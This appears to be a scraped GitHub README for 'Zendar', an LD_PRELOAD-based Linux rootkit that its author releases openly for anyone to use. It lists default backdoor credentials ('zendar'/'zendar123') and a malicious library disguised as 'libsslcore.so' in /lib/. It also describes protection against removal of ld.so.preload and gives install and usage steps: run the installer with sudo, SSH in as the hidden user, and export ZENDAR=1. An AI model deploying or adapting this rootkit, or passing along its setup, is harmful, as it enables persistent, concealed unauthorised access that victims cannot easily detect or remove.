ring-1 / zendar

Zendar is a Linux rootkit based off of the LD_PRELOAD method used by Azazel and Jynx alike

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

This is a private rootkit, and thus this README will not adhere to public requirements or preferences.
Scrap that. I have virtually no need for this, it's just a shittier, but smaller version of an azazel/jynx2 hybrid. Do whatever you want with this.
Alright, apparently there was some kind of strange interest in this. @Reiko: I changed how the user is prevented from removing the ld.so.preload file. I still use strstr(), so I do apologize for that, I will eventually get around to using a better method.
I understand that having to change configurable variables in both install and zendar.c is a tedious operation, I will centralize all variables in the install script eventually. I have a free weekend so expect that to happen this week. 
@Reiko: I also removed ptrace() from the kit.
Default configuration variables:    (install)
                                    username = "zendar"
                                    password = "zendar123"
                                    salt = "password_salt"
                                    home_dir = "/etc/ld.so.conf.d/"
                                    install_dir = "/lib/"
									lib_name = "libsslcore.so"
                                    (zendar.c)
                                    HIDDEN_STRING "_zendar"
									LIB_NAME "libsslcore.so"
                                    undef DEBUG
                                    ANTI_DEBUG "Secret Sex Loaf of a Single Mom"

Installation & Usage:               (installation)
                                    tar xvpf zendar.tar
									sudo ./install
                                    (usage)
                                    ssh username@host
                                        (the following will enable core utilities)
                                        alias ls='ls --color=auto'
                                        export PS1='\u@zendar \W >> '
                                            (VITAL, YOU MUST ENABLE THE FOLLOWING!)
                                                export ZENDAR='1'

About

Zendar is a Linux rootkit based off of the LD_PRELOAD method used by Azazel and Jynx alike


Languages

Language:C 73.7%Language:Python 26.3%